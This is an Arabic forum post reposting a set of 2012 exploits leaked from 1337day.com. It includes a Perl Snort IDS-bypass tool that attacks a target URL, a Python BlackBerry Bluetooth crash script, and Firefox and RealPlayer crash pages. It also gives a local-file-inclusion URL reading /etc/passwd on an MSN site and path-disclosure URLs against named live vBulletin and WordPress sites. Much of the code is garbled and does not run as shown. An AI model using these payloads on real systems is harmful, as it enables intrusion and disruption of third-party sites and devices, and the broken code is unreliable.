

mehdi racha عضو مميز

GoogleMarket bug for Android 4.1.1=>4.2 Remote Target DL PoC

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
 
You need
:
1Google Account
2
Android device 
3
PC browser
 
You can install an unlimited number of apps on the remote device from a browser on a PC.
 
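The key is:
1) you have entered your Google account once on the Android device;
2) if you manage to get hold of someone else's account (Gmail), you can install any apps from Google Play Market on this device;
3) without asking the owner of the device for agreement.
In other words, the precondition is control of the Google account linked to the device, so protecting that account (strong password, 2-step verification) is what prevents this.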
 
In this way unwanted software can be installed, and so many apps can be installed that the memory of the device will be filled.
 
# 1337day.com [2012-12-12] 
MS Office Excel 2007 Seven Memory Corruption Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

you can download POC from 
 
http
://1337day.com/private_files/msexcel2007poc.rar 

mirror http://www.mediafire.com/download.php?gc9h1yowx04c1c9
 
# 1337day.com [2012-12-12] 
Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

#!/usr/bin/perl
use IO::Socket;
 
# By Xianur0
[email protected]
# http://loscaballeros.mx/
# Snort Multiple HTTP Bypass
 
# Counter shared with analizerules()/checkrules(): number of rules flagged.
my $bypasscount=0;
# Usage banner; the script stops here when no argument is given.
# NOTE(review): the closing ")" of die( is missing as shown. The listing
# appears to have lost characters in extraction and does not parse as-is.
die(
"Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]);
# Mode selection: an argument that names an existing file or directory is
# treated as a Snort rules path and is only read locally (checkrules); any
# other argument is treated as a URL, and tests() opens network connections
# to that host.
if(-
f $ARGV[0] || -d $ARGV[0]){
print 
"[-] Analyzing Rules...\n\n";
checkrules($ARGV[0]);
} else {
tests();
}
 
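# Print a hex/ASCII dump of the string passed as the first argument to the
# currently selected output handle, 16 bytes per row: the offset in hex, the
# offset in decimal, the bytes in hex (in groups of four), then the bytes as
# text with non-printable characters shown as ".".
#
# The listing as published had lost several characters ("=" after $offset and
# $_, the commas in unpack/sprintf, and the brace closing the else branch);
# they are restored here. Rows are also skipped when empty, which the original
# template produced for input whose length is a multiple of 16.
sub hdump {
    my ($buffer) = @_;
    $buffer = '' unless defined $buffer;

    my $offset = 0;

    # One "a16" field per complete 16-byte row, then "a*" for the remainder.
    my $template = ( 'a16' x int( length($buffer) / 16 ) ) . 'a*';

    foreach my $data ( unpack( $template, $buffer ) ) {
        my $len = length $data;

        # "a*" yields an empty chunk when nothing is left over; printing it
        # would add a row of blanks.
        next if $len == 0;

        my ( @array, $format );
        if ( $len == 16 ) {
            # Full row: four big-endian 32-bit words.
            @array  = unpack( 'N4', $data );
            $format = "0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
        }
        else {
            # Short final row: one hex pair per byte, padded to 16 columns.
            @array = map { sprintf '%2.2x', $_ } unpack( 'C*', $data );
            push @array, '  ' while $len++ < 16;
            $format = "0x%08x (%05d)"
                . "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";
        }

        # Replace control and high-bit bytes so the text column stays printable.
        $data =~ tr/\0-\37\177-\377/./;
        printf $format, $offset, $offset, @array, $data;
        $offset += 16;
    }
    return;
}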
 
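# Decode the |..| hex notation used in Snort "content" strings, e.g.
# 'a|41 42|b' becomes 'aAB' . 'b'. Text outside the bars is returned unchanged.
#
# Differences from the published version:
#   * only hexadecimal digit pairs are decoded; the original accepted any
#     [\d\w]{2} pair and turned non-hex pairs such as "zz" into NUL bytes;
#   * decoding is a single pass, so bytes that decode to "|" are not
#     interpreted as the start of a new hex run;
#   * all working variables are lexical instead of package globals.
sub snorthexdecode {
    my ($encoded) = @_;
    return $encoded unless defined $encoded;

    $encoded =~ s{
        \| ( (?: \s* [0-9A-Fa-f]{2} \s* )+ ) \|
    }{
        my $run = $1;
        $run =~ tr/0-9A-Fa-f//cd;    # drop the whitespace between byte pairs
        pack 'H*', $run;
    }gex;

    return $encoded;
}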
# Read one Snort rules file, or walk a directory of them, and print every rule
# whose "content" match fits one of the two patterns below. Each hit increments
# the file-level counter $bypasscount. Nothing is sent over the network here.
#
# NOTE(review): as shown, the listing has lost characters in extraction (the
# brace that closes the -f branch before "elsif(-d", and the comma in
# opendir), so it does not parse as-is.
sub analizerules {
my $pathrules=$_[0];
if(-
f $pathrules){
# Two-argument open on a bareword handle with no error check: an unreadable
# file is skipped silently, and RULE is never closed in the visible code.
open RULE,$pathrules;
while(<
RULE>) {
my $rule=$_;
$rule=~s/[\r\n]+$//g;
# Case 1, rules using http_uri: after hex decoding, the content is a name with
# a 1-4 character extension, then "?" (literal or |3F|), then more text. The
# reported variant puts extra text right after the "?", so a rule flagged here
# depends on the parameter following the "?" immediately. For rule
# maintainers: matching the path and the parameter separately avoids that
# dependency.
if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){
if(snorthexdecode($1)=~/([^"
]*\.\w{1,4})(\|3F\||\?)([^"]+)/){
my 
$bypass=$1."?junk&".$3;
print "
[!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n";
$bypasscount++;
}
# Case 2, rules using http_header: the content is "Name: value" with exactly
# one space after the colon. The reported variant uses a tab instead, so a
# rule flagged here depends on that single space.
} elsif(
$rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){
if(
snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){
my $bypass=$1."\t".$2;
print 
"[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
# Directory: recurse into every entry except names made only of dots.
# NOTE(review): DIR is a bareword (package-wide) handle and the recursive call
# reopens it, so an outer directory listing is presumably cut short once a
# subdirectory has been walked. The loop also relies on readdir assigning to
# $_ inside while(), which older perls do not do.
elsif(-d $pathrules) {
opendir (DIR$pathrules);
while(
readdir DIR) {
analizerules($pathrules."/".$_) if($_ !~/^\.+$/);
}
}
}
# Analyse the rules found at the given path (a file or a directory), then
# print the number of rules that analizerules() flagged, taken from the
# file-level counter $bypasscount.
sub checkrules {
    my ($checkpath) = @_;
    analizerules($checkpath);
    my $summary = "[-] Bypassed rules: " . $bypasscount . "\n";
    print $summary;
}
# Network mode: parse $ARGV[0] as an http:// URL, build two raw HTTP messages,
# send each over its own TCP connection, and hex-dump both what was sent and
# everything the server returned.
#
# NOTE(review): as shown, the listing has lost characters in extraction (for
# example the "." between "%" and uc(...) below, and the closing brace of this
# sub), so it does not parse as-is.
# Detection note: both messages are visibly unusual on the wire (bare newlines
# before the request line, long runs of CRLF between requests on one
# connection), which a proxy or web server log can record independently of
# the IDS.
sub tests {
my $host="";
my $port=80;
my $path="";
# Split the URL into host[:port] and path; only the http:// scheme is accepted.
if(
$ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){
$host=$1;
$path=$2;
if(
$host=~/^([^\:]+)\:(\d+)$/){
$host=$1;
$port=$2;
}
}
# An empty host (no URL match) or a host still containing ":" is rejected.
if(
$host!~/^[^\:]+$/){
die(
'Invalid URL!');
}
print 
"[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
# A path of at least one character after "/" is required.
# NOTE(review): the assignment after die() is unreachable.
if(
$path !~ "/(.+)"){
die(
'I need a path...');
$path=$1;
}
# Percent-encodes every character of the path except "/". In the visible code
# the encoded form is only printed; the packets below use $path.
$encodedpath=$path;
$encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg;
print 
"[-] Encoded path: ".$encodedpath."\n";
# Five labels are declared, but only two packets are built below.
@
orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
# Two POST requests for "/" on one connection, each followed by twelve CRLF
# pairs; the second declares Content-Length 30 but carries a 10-byte body.
my $payload="POST / HTTP/1.1\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 30".("\r\n"x12).
"1234567890";
 
# Packet 0: a HEAD request for the path, preceded by four bare newlines.
# Packet 1: the POST payload above followed by packet 0.
@
packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];
 
$i=0;
# One fresh connection per packet; the read loop runs until the server closes
# the connection, and no timeout is set in the visible code.
foreach 
$packet (@packets){
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die 
"Could not create socket: $!\n" unless $sock;
print 
"[-] Seding ".$orders[$i]." test...\n";
hdump($packet);
print 
$sock $packet;
print 
"\n[+] Headers:\n";
my $todo="";
while(<
$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}

 
# 1337day.com [2012-12-12] 
MSN LFI Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

http://logitheque.msn.fr/recherche/recherche.php?searchstring=../../../../../../../../etc/passwd%00&plus=telecharger&chaine=forums 
 
# 1337day.com [2012-12-12] 
Blackberry OBEX PUSH Crash (Bluetooth) PoC

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

#!/usr/bin/python
 
#Blackberry Bluetooth Crash (OBEX PUSH)
# By Xianur0
[email protected]
# First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel])
# By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc...
# ATTENTION: The channel of obex push can vary from blackberry to blackberry
 
import binascii
import serial
 
# Local file whose bytes are read by enviar(), and the object name that
# enviar() encodes into the packet it builds.
# NOTE(review): the first assignment is split across two lines as shown; the
# listing appears to have been damaged in extraction.
filetosend
="/home/xianur0/image.jpg"
nametosend="crashingyou.jpg"
 
# Build a hex string for a name: "00", then for every character its code in
# hex followed by "00". For ASCII input this looks like the hex form of the
# name in 16-bit big-endian characters plus one trailing zero byte (TODO
# confirm against the caller's packet layout).
# NOTE(review): hex(ord(x))[2:] gives a single digit for codes below 0x10, so
# such characters would misalign the output. The "=" after hexstring and the
# indentation are missing as shown.
def filenamed(string):
hexstring "00"
for x in string:
hexstring += hex(ord(x))[2:]+"00"
return hexstring
 
# Turn a string of raw bytes into an integer: each byte becomes two hex
# digits (left-padded with "0"), and the concatenation is parsed base 16,
# i.e. the first byte is the most significant.
# NOTE(review): the "=" signs and the comma in int(hexval, 16) are missing as
# shown. An empty input would make int() raise ValueError.
def bin2dec
(hexstring):
hexval ""
for a in hexstring:
aux hex(ord(a))[2:]
if 
len(aux) < 2:
aux "0"+aux
hexval 
+= aux
return int(hexval16)
 
# Format an integer as a hex string: an odd number of digits is made even
# with a leading "0", then "00" pairs are prepended, presumably until the
# string is "largo" bytes long (TODO confirm).
# NOTE(review): the two conditions are damaged as shown ("*!=" and
# "len(retorno)/largo" have lost characters), so the intended comparisons
# cannot be read from this listing. The "/" on lengths assumes integer
# division.
def dec2hex(dec,largo):
retorno hex(dec)[2:]
if (
len(retorno)/2)*!= len(retorno):
retorno "0"+retorno
if(len(retorno)/largo):
for 
i in range(largo-(len(retorno)/2)):
retorno "00"+retorno
return retorno
 
# Open the serial device /dev/rfcomm0, read the whole file at "filepath" into
# memory, then repeatedly write a fixed 7-byte message, read the reply, and
# write a second message built from the encoded name, the file length and the
# first "sizefragment" bytes of the file.
# Return codes visible in the code: 1 when the device cannot be opened, 2 when
# the reply length is not accepted, 4 on any exception inside the loop, 0 at
# the end.
# NOTE(review): indentation and several operators ("=", "+", ")", a
# comparison in "if largo 0") are missing as shown, so the nesting of the
# loop and of the final close()/return cannot be determined from this
# listing. The bare "except:" clauses hide every error, and the file handle
# is never closed.
def enviar
(filepath,filename):
serialrf None
print "Loading..."
try:
serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0
except:
return 
1
print "Ok!"
filename filenamed(filename)
filebinary ""
filehandler open(filepath,'rb')
for 
linea in filehandler.readlines():
filebinary += linea
lengthfile 
len(filebinary)
print 
"File Size:",lengthfile
# Only this many bytes of the file are placed in the message built below.
sizefragment 
38
while True:
try:
print 
"Sending bytes..."
# Fixed opening message; presumably an OBEX connect request (TODO confirm).
serialrf.write(binascii.unhexlify("80000710001000")) # Initialise
print "Reading..."
status serialrf.read(1)
print 
hex(ord(status))
# Only replies whose first byte is 0xa0 or 0x10 are processed further.
if 
hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10":
# The next two bytes are read as a length; the rest of the reply is consumed.
resto serialrf.read(2)
largo bin2dec(resto)-3
if largo 0:
resto serialrf.read(largo)
else:
return 
2
# The header carries the encoded name and the length of the whole file, while
# the body that follows holds only the first fragment.
header 
"01"+dec2hex((len(filename)/2)+4,2) + filename "00c3" dec2hex(len(filebinary),4)
lengthheader = (len(filename)/2)+12
fragmento 
filebinary[0:sizefragment]
envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2))
envio += fragmento
serialrf
.write(envio)
except:
return 
4
serialrf
.close()
return 
0
 
 
# Script entry: calls enviar() once with the two module-level settings; the
# return code is not checked.
# NOTE(review): the closing ")" is missing as shown.
enviar
(filetosend,nametosend
 
# 1337day.com [2012-12-12] 
Mozilla FireFox 17.0.1 Memory Corruption PoC

كود PHP:
<!--
//...Leaked bY beBoss..// 
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
###
# Title : Mozilla FireFox 17.0 Memory Corruption p0c
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Linux SUSE - Enterprise v.11
# Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2]
###
 
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
 
-->
 
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javaاستبدال script:KedAns();">
<استبدال script language="Javaاستبدال Script">
// Runs on page load: writes a short string into the document, then writes an
// ever-growing string in a loop.
// NOTE(review): nothing in the visible code shows memory corruption or code
// execution. The loop triples "buffer" on every pass for up to 1000 passes,
// so the growth is exponential and the expected result is memory exhaustion
// or a hang of the tab, i.e. a denial-of-service test case.
// NOTE(review): the word before "document" below looks like it was inserted
// by the forum's content filter, the unescape() arguments appear to have been
// decoded in extraction, and the function's closing brace is missing as shown.
function KedAns()
{
 
// (puf) is only there to build a buffer and crash.
// The author suggests shellcode might work with this proof of concept; the
// listing itself does not demonstrate that.
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
 
استبدال document.write(puf); // Buffer1
 
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
// Each pass makes buffer three times as long, then writes all of it again.
buffer+=buffer+buffer
استبدال document.write(buffer); // Corrupt this !!!
 
}
 
// [ Memory Corruption !! (*__^) ]
 

</استبدال script>
</head>
</body>
</html>
<!--
 
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ --> 
 
# 1337day.com [2012-12-12] 
vBulletin 4.2.0 Full Path Disclosure Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

The Full Path Disclosure in vBulletin 4.2.0 is in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the time it is the same) cPanel's username.
 
To see it go to:
 
http://[path]/forumrunner/include/album.php
 
It works in 90% of the forums.
 
 
Example:
http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php 
 
# 1337day.com [2012-12-12] 
Wordpress 3.4.2 Full Path Disclosure Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

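The Full Path Disclosure is in WordPress <= 3.4.2. With this information you can get the path to the site you're in and (in most cases) cPanel's username. The path is only revealed when PHP is configured to display errors, so turning off display_errors in php.ini removes the leak.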
 
To see it go to:
 
http://[path]/wp-includes/rss-functions.php
 
 
Examples:
http://tsmp.us/wp-includes/rss-functions.php
http://tafeio.com/wp-includes/rss-functions.php
http://santana1540.com.br/wp-includes/rss-functions.php
 
It works in 90% of the websites.
 
# 1337day.com [2012-12-12] 
vBulletin 4.x/5.x multiple Full Path Disclosure Vuln
كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subاستبدال scription_entrylist.php
/includes/api/1/blog_subاستبدال scription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subاستبدال scription_addsubاستبدال scription.php
/includes/api/1/subاستبدال scription_editfolders.php
/includes/api/1/subاستبدال scription_viewsubاستبدال scription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subاستبدال scription_entrylist.php
/includes/api/2/blog_subاستبدال scription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subاستبدال scription_viewsubاستبدال scription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subاستبدال scriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php 
 
# 1337day.com [2012-12-12] 
RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

كود PHP:
<!--
//...Leaked bY beBoss..// 
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
###
# Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Windows7 (Fr)
###
 
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
 
Info :
Save the HTML Code as p0c.html and drop/open it with Realplayer
ABCABC........... Boom !!! ^__^
 
-->
 
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javaاستبدال script:KedAns();">
<استبدال script language="Javaاستبدال Script">
// Runs on page load: writes a short string into the document, then writes an
// ever-growing string in a loop.
// NOTE(review): nothing in the visible code shows memory corruption or an
// overflow. The loop triples "buffer" on every pass for up to 1000 passes,
// so the growth is exponential and the expected result is memory exhaustion
// or a hang of the host application, i.e. a denial-of-service test case.
// NOTE(review): the word before "document" below looks like it was inserted
// by the forum's content filter, the unescape() arguments appear to have been
// decoded in extraction, and the function's closing brace is missing as shown.
function KedAns()
{
 
// (puf) is only there to build a buffer and crash.
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
 
استبدال document.write(puf); // Buffer1
 
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
// Each pass makes buffer three times as long, then writes all of it again.
buffer+=buffer+buffer
استبدال document.write(buffer); // Corrupt this !!!
 
}
 
// [ Memory Corruption !! (*__^) ]
 

</استبدال script>
</head>
</body>
</html>
<!--
 
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
